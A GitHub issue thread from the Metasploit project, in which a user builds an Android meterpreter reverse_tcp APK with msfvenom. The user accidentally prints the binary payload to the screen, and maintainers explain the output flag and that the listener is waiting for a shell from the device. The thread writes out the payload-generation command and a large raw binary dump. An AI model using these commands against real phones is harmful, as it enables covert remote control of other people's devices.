### ISSUE TITLE
why i do get this kind of output?

### ISSUE THREAD

**Issue by azamet90** [rapid7/metasploit-framework#12591]
sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.39 R andro.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10182 bytes
P�#qO�����PndroidManifest.xml��KoSGǏ�@�qB�1y@ O�@��@��"��]T�`B��+8��Z�������
U�K>@�]tQU�˪�
uY�
S�V{�B��F�E*~&B��n�,tz��
                      =�����^@?B�@B3�2�S��g�7ë"�@��(��>�^B�a�<��YMtz��"�z����z�]�!�
�j� Nh���k�f�
             �}	}
                 ��^A�uD����=��_�����7���P=za�v�m�m�<~��r�$C���K�q݄%����}���T@�]����N5~}�!���]�o�=��WV���pל*��K����=�z�-FM��s\)E{�؂�MK?��G ��o�~��3��I�?��V�"ε
�$jR�<�ef�#5�=z�T�8-#�5���.�h��3�~��O��t        ��i��^��ۼ���5��~%S,��C-C>
\M?s�KI�az_/��[vγ������0�ȸ�2���E��,^�9�Ĕ�2z����d�_��F*�z���lI򈘹�±,����*��7�eZO�
X^�^�H�����X{�j�7ތY�u��l���άॊ�K�s�$�+>A�·A�fw2;��D���p�>�����.��k�|��av�=��ûi�c)5RLn9���SǶ���I�잛�N��n���������<�����Qj��b~M�]���������b���}�M�I^�&./�
P}��Y��*�A���[瓃9�<D���tVW�Q������en=�g���	)Ļ���%ū��޼��\����9hS��Dm��8żu�r�y-k��9�R��H��T�ᕸ�s0��AE�
S(��v��������N�U��ŧ��
                     ������O�ϥ�8gz�z��2��DCb3�f�w
7K9^�El-b;��Q��[���k�8�<s�q�IU*�*��CX�La�5�2m���-�ۥ��j���~^l���y5�N�u*^��q�u	�K�"^��[x݊Wk��9�z�ףxu^�/&����)^������uZx]��(^������u[x=�1�)^��s��
DQ���;%�NI\�����g����O�:�,}1-�i�A?�wJ�߱����Q���o+^����9��K(^������ބ��[xǕ}��P�sէ��<s|�3�V~���
���6���ҲF�:�8��y����kVl�*� ��w�!�9��)^���9���Yx��{Qx/���O�ݷ�s�����Wb
                                                                    �|�$�_R1%ŖTc>�0�'�M	;�⟴�{ƒ�T /?�s�>_"_����� ���n1W�� ˷O�7�}&�N
�����P�#qO-��<resources.arsccb�a�ab``da

                                      ���M��sL.�,�,�
0)02����
        �
         �
          z@��P����m�Bd�%V#?ɒ��m��%��[�K����@`����Y�B�RJ�
t��s��v������o$=;���s�����tg�ܹ3s�ΝQ��1c������w�nj����/�R�j~��\���ό��hvl��d�0@�s������a�>'Q�z�;@5/Q)��r��D+�>z�4�Y�	���W���g��?~�
                     ���/����Z*��&`
                                   v��~�
                                        ���x��#�w@�����=�{��_~x:���y�}���s����N��f�w����P�E�8
                                                                                             ��{�ǀg��Z7�J��n��7O�^�=D5@0$�wO��X*�&���Y��I�@�A�+�5@=�lv{��@'�
                                                ƀ(p�	H�M���'���սD+��@�
                                                                         nf���ǁ���_/�<�06`=���8
�$�f�y�N�-����C��OO�~�'����O���N��������|x����%�"�;�����H���V`'�����
��                                                                  0�
  �y�I��Y��?�hv��C���L3�<�f�p?�0�ۓ����Wk� �b/��&��
                                                  \	l�ۀF�  ��v`����Z�V`����`k�#a��a����	.LpS���\t��9�I�PEC�a��ш�OG�1�Z�:�z�(p
                         ��x-�:�8Ɓ(
                                   �0-� 0�
                                          ��
�x���"c�O��0�
�_�|�̇�/���L�~k=T��J���_�s�������I�+���뒿��mW��I�������o��5r��m����6�F���y1�:��ʶ��m.���mW��]௖ya���Wge�f��_�ɾ��=(u��ƶ�f����I~@���Ϋm2�R��9�2/�8����֙(�"o���O��[�)��7m������6�E[�[�U�d^;P���'e��@��:[~=�Y��jk�b˷(�砭��M�[>f��曰�6=����u��g}��32�@!��_ȋ9������;`�]�m�E���_�K�Z%c����j���l�~Aү�>�����t7�e��[%�>�az����!���I�u�ۯ@��L��~<�>޳*ׯ�W��>j�:����[�j�F�/��1�������>�&���sl����=L��Kd�)�
                                                   [P7"�_3�ңL�1�+�<��>ǥF�/�����b���s��@��t
                                                                                          }�D
t����s����1����0��]-��8��L"fX����?0U�I��.ӭ<�Z�K$�Hj�k���u��3��������yݬ�+p�Y���t�Կ�����I:��   �\9��S�|��W
���i�3��U��j����]��v��������&�ۙ������?Xz�@T�h=����䶨��.���`'�C��E{��/�;%�K�z��?�{�v����s�>ȴ�~����\���bZM`��>�Џ�̱�4Âofz���<��$zЯ��A_e���o��ai�0��E�����wL�;L�$��0
                S��,��-=���*�nx�c|���W���L-�� �a�Ӈ�V���ɲ{+,��|���Zr{��Ŵ�a�N?�;�5����nI�2ݏv���5l�6�㧘����}�j�{�ɴ��˴�>�t=}��k�\'���/nz��n�Y�m�m>[7������i7}F�u�CVZ@�|�W8.-�������ڒ����%�힒��E��Q�L}h`�ji������zqF��1�����ղ~��7��:[�ն�g
�������W�����R|9,GTT��Mq�L�cJ�L}�\���|'V+�V�9�	m� �S��������ͱ���8x�-M;X��hs�o��^��X3<J��S�(�a�Շ��>�ƞ(�-Hܝ}j*�#f��U�
��^+Q.�sjx��������#qq\QHU�4�W6oi��(y_,�xVBuJ
bv���6n�wu?VA���S�딾e�^a���6Ӆ�k�z�1q�9p
                                       �,��պ���03���'6O�~��{�m�/�P2�����q�/[��hjOSSs�����-�;w4�hݳ����E�
���
   ����������������������������������������������N��̈́x�\ίr�ě�q�Z���ș��b公O/�3��R�R
k�=d}&��
        ����QZ?#di���7�����D^��(�QM��.���v�j-�ŅQR��uHsQ*�Q5�������:��^�;rov^���=����~�8���Q-�(�l�h\qC���
�9�O�b���?A�����s�v,,,�f�L�ɫV9��T��>U���>��C��Qe�~H��Y�R�X�%���*�
�Z/f�u����_�|�U��>���A����)�ޏϐvչ,[���J����k����������A��a�QE�저�]���C�zhw��AВ:mPP�́��?�x�;����:��U�_�[(S�B٫���a�]�����J�u���ױ�QB!�;�7���|��וj�ɱ���~�_������cTy�:tbob� E+P5�xI�t~���=^���i�MD��b�i8RJ?R�E�切�4lU�޶�u���^+3\�Y
Wlne�x�xX�o������2��#������Z�Ш�
7A�T��;&T'��Tӈ��F�W]�+A=�e��RBZ�>���T�>�t��$+?�����+�:�2V?{�����)�(�Ы��z����â����Xnk�7���U�T�٥8��h
                                                                                                  ��v��g8b���q�8Y�~*�
�W�-ʑS���6���R�4�Ն���8,��j�*<Y�Fc*���s�Q�R�iJ�~Ɗ��8�d*|%��<�M�[��F�
-�C�7%                                                             :ZI�p��C�Z�S;frI��0�zj�d5|�
��~�+"�b�E�=(�{IQ�}X��Rm�Y��+"�V�R�p�Sz��s
�_�w��W�s0�8��հ�.޻W��v�жT�M               `.;�s���s߹i��7��`=
p<��3\W���ۨ���F�p�"��8%���=>m]���U���X��%*E�U({��G�\����q�6<g�_��]
��WJT�:\���"��IQ���tN%�AUS�Z�a��ml��?*����O���6�B���[W���E�      �C���������Sß4�E��a�Zc
o�ݥ����Զ�UZJ����D��N��aڢV�D��0
           �M�E�Ƕ��A��Z�s8!֠���u���(U!�Q%~9�b�Z�U��Q��ቻ��T����揢m����3�yg�A�<Y��I2�l[!�ޕBﵢwŏ�
�����9��Ѭ���v/��8[\:֍��i��NZ���u�Oݘ����sz��vZ���Ė�?"�\'ly�m%|�8�烣�E�~#u ^�*bm�.T$�^W��ӉȢ�)��J�_��j�1���T���]F���[!�h�'![�}o�/�]�?讼������z꒘�d�S��������1D�r����⷇����@k�=�8u�r
                                                                   G�������W�c��~rh!m��*��m�h]����:��o����Y��B�`ِ���0�M��'����]��	/G����=�V�7��zp�'1�����0�y���[�<�\u���WmU+YS@�D�
{�V�^g��*���Xc���a��f�
                      �M�+.�}B�\7�r�=~�lÿ]�2�2^���TIK��0��%�O��`^�0&���s����ٗ�֗[ʈ�Y�����X�r�Aܓ%/$�zI7HlD�Q�Vsg<S��a�U��mf��R�n������a�X�]�7o3�C�|e�v�F�����'X}�m,]A�/C�h$�1f���H��&R���'H%������'�>�*�����+�G�޾^���K�ޑ�m--3�ԑNFb�H&;lD�����Kk/�LN��&r�IhY���lv/������^ZwIMj2?�^�Dr��Ad(=9i�GL|bt�儆�L21cXj*���m:��索<+�i�6c	L���<��noG܌	�"}�dJ0Cv�P򴑖�\m�ї����j���n49�4id#�T"�6e��h����Bn���2K��t��X^f(2��>����G.[3~ٚ�ek.ߏqٚ��9)f�$f⧚2s��1��e�v&"�L�d9�M��HS<��1�5������t65�ɦ�ȤX��@W$5mU�EU�����z�©�ʋek�u����ً�7��G��t*�Lg�X�M�����٨��Ɠ��M�KD̓M�d�b�l���b)+g��Ҋ�d�'�]b��&s���N�[t13��N����m��7Ѭ�x��iFƅ=�0
                                            f�_*c:��,gOX��mc��^���Zm�H``"�e���h6��/�"�~#;����+���lFz���ׂ+$���:2�'�^F�&4���X5#:�FD@o�
|���8�1�E��O�Gp��|l�-��$�&3Y�Ә��`�1�t����%��i�,�9�%Y���u�­6�-���Do�L~�׋Վ��jmܾ�yʈ��ŀ�E|����
,���e�ԍ���.�L�lOD��ܥ���L6��#ݝ�]#�9؎;�J�����n���m�'1eR�H�eb
��,�X}lɔ�1��]��r�-�"Q��D���i�|���X�J�щ�N���Gaؘ��6J�9;Gy�6��Ә;D�=O�suq�64F��;G_�9�?��=��UаX���w��K�r(�}�G:vc��a��{#�L͑2NJ���	#z�3G;���<+T�x�h"�1�,�!g��8E i�{*��ƈ�R�Ė�'�
                                                           )1rŌ����+��da�H":����:��j_�O$�A�'�iq�#�$9N�Y��G�8�T�Yc(�� �`����Lf�Hg��<K9���*�&yQ�
                                  3,E^L*��mg!W��]Č(���u����P�㳟�T	��"��,���6�L%��.��-kq�ȐW%��Z�D$3�p@��9�g�4q�'WܜI�2��tO��}%q�ȕ0̓��G\��2�Mb*��E��q:?MQ��Q/:s�O���J��J%I��=�<IS^��<i�d#iXzr��2|�ݨ4e�~I*��B��B�$gJ�E�"�=+Br4�hj���s֥]n�����r�O�\3਎��Ie���;'��(��/�1t�9�Y�B��P�̥����a�����Ό�)�2ք9DS)�zMvQ�*�t^.e���Ƒ���$���9+��2I��TLX֍od�� vǌFp��N�%"E��}^��v�vWP�V��H0�\@ɡ�F�7A���:��`�Ny2�(χ�_�p��_�̼�JH�����
                                                                           �K1�{qB�+�'M��i*U���R���R�w>���sE`+�<�V�ϥ�ٌ�=?�x�:��)���y�?���3*�c~vg僳b�Pzavw�+����_m�c^;7�x��Sy��J�#�S�(�/�B.���Bڏ��r��w�r�g����M'�;��>�����{|��ԉ����U��߫S���<�Nѭ����W��~�w��r!��@��PK�#qO	META-INF/P�#qOA�2�META-INF/MANIFEST.MF]��
?�U��;�M+ʄVt3�p�j7�d'f��c�o߅�h����4�3���3� s�p,[׶L	�W@Ϡ���o�5]�P�<��S%!
   �k��w�)d��](�A3__$ԇ��&W�X�`�Η���ʻJZTa�G�r=;ٱ��N�T�,|u&��C$�">���6)��T���8
                                                                            ��CSo�j�C��?P�#qO�
                                                                                              9��META-INF/SIGNFILE.SF]�AO�0��������A#²��Ԡ��^L�>�*m�_�m�z�	�7y^&�m��4:%4�����c���7��3�5ɥ�t��,���� 
                                                                                        V\AJ2][#�k���^��g4���!�d�
     ��V>��6����M�^�Hl��6�x+cnQ����kՕe6������'�ѩ}��b�����?\.K�݌L9I�I���T6[^,��P�#qO�����2META-INF/SIGNFILE.RSA3hb�c��j�h����δ��]ޠ�]���ѐ߀��3�̓1���������qA�,�&��M�312u��C0��k���1���	ˆ���:��g��;���
.�I��r⼆�Ɔ&��Q�ƦfF��F�FQ$��Ĩ��
                              �������\LM��
                                          ���W�Ti���%!��r�U���3����񮿫�t�����?� ���vʦ�}NGmP�?�݄�lB�d�}�ڽ�m�ζ�wI��>��u���_��wzgD�3�;�����m��͸���ڜps�x�iB������j�9�����e���ݧ5f���z����A���7���Z�dՏ��UswV�;��HΏ�^٦�WrM9���Y6��sV�g�-�r�:ϯ
����>tL*!�M�rn¹�يt�Y�.r�\�ll���=���jY�V�8�fbfd@�(fP��otL_�����O��#!��f�m�Q[�q&7�߻Ņn��MSS簼^��Y�ٜ�?K�{�7�y���W׃�)�
    _�b~���g{Z��9����+o�Z@���2{/O�9��wJn=7�5һ͞�>�iR��lL��wL��ܹS{�Β|�R2��N�4cgZ����zϮ��yt
                                                                                      ���o��ox8�j{�)�sݗ�^1�z�v����gTɇ��͏�2�4MP�8n+2�ҪYq%}���j?Q���j�|���A�����,fy_�p����<���Mb6lb���P:�%>�A�=r����X�\��3��]���鴣�ʧ|X`���λ�v��T��g�K���V�i�I�a��a���^[�T�ܸ���,a{��E��~4�bi�[?}�%��3�:>_��pTH�J�%�=	��e�NUx�~�[(r����A��׃�~d�q�k>�S]���y��<���I���
�M	�zS6����fQ�����YGV�:�@园�,�%�^sd���Y�MJLm�ߛ�m˃�S�3*-����ߴe��B�x�9�^e����g��i�����V������i����P�#qO�����PndroidManifest.xmlP�#qO-��<�resources.arscP�#qO_>���TO
                                                          �classes.dexPK�#qO	�META-INF/P�#qOA�2��META-INF/MANIFEST.MFP�#qO�
                  9��� META-INF/SIGNFILE.SFP�#qO�����2�!META-INF/SIGNFILE.RSAPK��%

**Comment by bcoles** [comment]
`stdout` is the default output. You can override this with the `-o` / `--out` option.

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.39 R -o andro.apk
```

Also, `msfvenom` should not need `sudo` privileges.

**Comment by azamet90** [comment]
> `stdout` is the default output. You can override this with the `-o` / `--out` option.
> 
> ```
> msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.39 R -o andro.apk
> ```
> 
> Also, `msfvenom` should not need `sudo` privileges.

and why it stucks here? https://i.imgur.com/YEeymaX.png

**Comment by azamet90** [comment]
after i see that i wrote wrong the command but after fix it result is same: https://i.imgur.com/WfOKgXl.png

**Comment by h00die** [comment]
you asked it to start a multi handler, and listen for inbound connections, so that's what its doing.  It isn't stuck, it's waiting on an inbound shell.
If you need to do other things during that time, try `run -j`

**Comment by azamet90** [comment]
> you asked it to start a multi handler, and listen for inbound connections, so that's what its doing. It isn't stuck, it's waiting on an inbound shell.
> If you need to do other things during that time, try `run -j`

but why on this video it is not stucking there?
https://www.youtube.com/watch?v=tT3g8KbqYyY
somethings with tcp is writing after?

**Comment by bcoles** [comment]
![image](https://user-images.githubusercontent.com/434827/69001954-ad186900-093b-11ea-8e55-f6b4af58e934.png)

**Comment by h00die** [comment]
A few things.
1) the github issues area is for framework bugs, you're asking for tutorial and learning help.  Please use the appropriate places:  "Slack team - metasploit.slack.com",  "IRC channel - #metasploit on Freenode"
2) While you haven't given us all the info issues request, they are running version 4, you are most likely on 5.
3) It's waiting on an inbound shell, as previously mentioned.  You need to give it a shell by (most likely) opening the payload on your device
